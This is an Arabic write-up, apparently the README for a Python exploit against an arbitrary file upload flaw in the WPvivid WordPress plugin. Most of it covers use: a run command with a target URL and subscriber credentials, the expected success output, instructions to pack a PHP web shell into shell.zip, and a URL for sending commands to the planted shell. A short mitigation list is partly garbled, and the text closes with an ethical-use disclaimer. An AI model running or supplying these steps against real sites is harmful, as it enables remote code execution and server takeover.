
تاريخ النشر: 2024-10-16 | الترحيل، النسخ الاحتياطي، التجهيز – WPvivid <= 0.9.35 - رفع ملف تعسفي (مُصادق عليه Subscriber+)
إضافة WPvivid لووردبريس، المصممة لترحيل المواقع والنسخ الاحتياطي، تعاني من ثغرة رفع ملف تعسفي. تسمح هذه الثغرة للمستخدمين المُوثّقين بصلاحيات منخفضة برفع واستخراج ملفات ZIP، مما قد يؤدي إلى تنفيذ أوامر عن بُعد (RCE) إذا تم نشر سكربت ضار داخل الملفات المستخرجة.
تم إنشاء سكربت استغلال بلغة Python لاستغلال هذه الثغرة باستخدام المنهجية التالية:
إذا نجح الاستغلال، سيعرض السكربت ما يلي:
[+] Logged in successfully.
[+] Target is vulnerable. Proceeding with exploitation.
[+] Uploading file: Success
[+] Confirming upload: Success
[+] Starting import: Success
[+] Shell uploaded successfully at: http://target-site.com/wp-content/nxploit.php
تأكد من وجود ملف shell.zip ضار في نفس الدليل الذي يوجد به سكربت الاستغلال.
يجب أن يحتوي ملف shell.zip على شيل PHP (مثل nxploit.php).
يلزم وجود حساب ووردبريس صالح بصلاحية مشترك أو أعلى.
python CVE-2020-36842.py -u http://target-site.com -un username khaled -p password 123
سيقوم السكربت بفحص إصدار الهدف وتسجيل الدخول باستخدام بيانات الاعتماد المقدمة.
إذا كان الهدف عرضة للثغرة، سيقوم السكربت برفع ملف shell.zip واستخراجه.
في حالة النجاح، سيوفر السكربت رابطًا للشيل الذي تم رفعه.
بمجرد رفع الشيل واستخراجه بنجاح، يمكنك التفاعل معه عن طريق إرسال الأوامر عبر رابط مثل:
http://target-site.com/wp-content/nxploit.php?cmd=pwd
للتخفيف من هذه الثغرة، يُوصى بشدة بما يلي:
wp-content/uploads باستخدام ملف .htaccess أو إعدادات الخادم.تشكل هذه الثغرة خطرًا كبيرًا لأنها تتيح للمهاجمين المُوثّقين رفع وتنفيذ ملفات ضارة على خادم ووردبريس. يجب على مسؤولي الموقع اتخاذ إجراءات فورية لتأمين تثبيتاتهم.
إخلاء مسؤولية: هذا المستند مخصص لأغراض البحث الأمني الأخلاقي والتعليم فقط. استغلال الثغرات دون إذن هو أمر غير قانوني ويعاقب عليه القانون. ( Nxploit | Khaled_alenazi )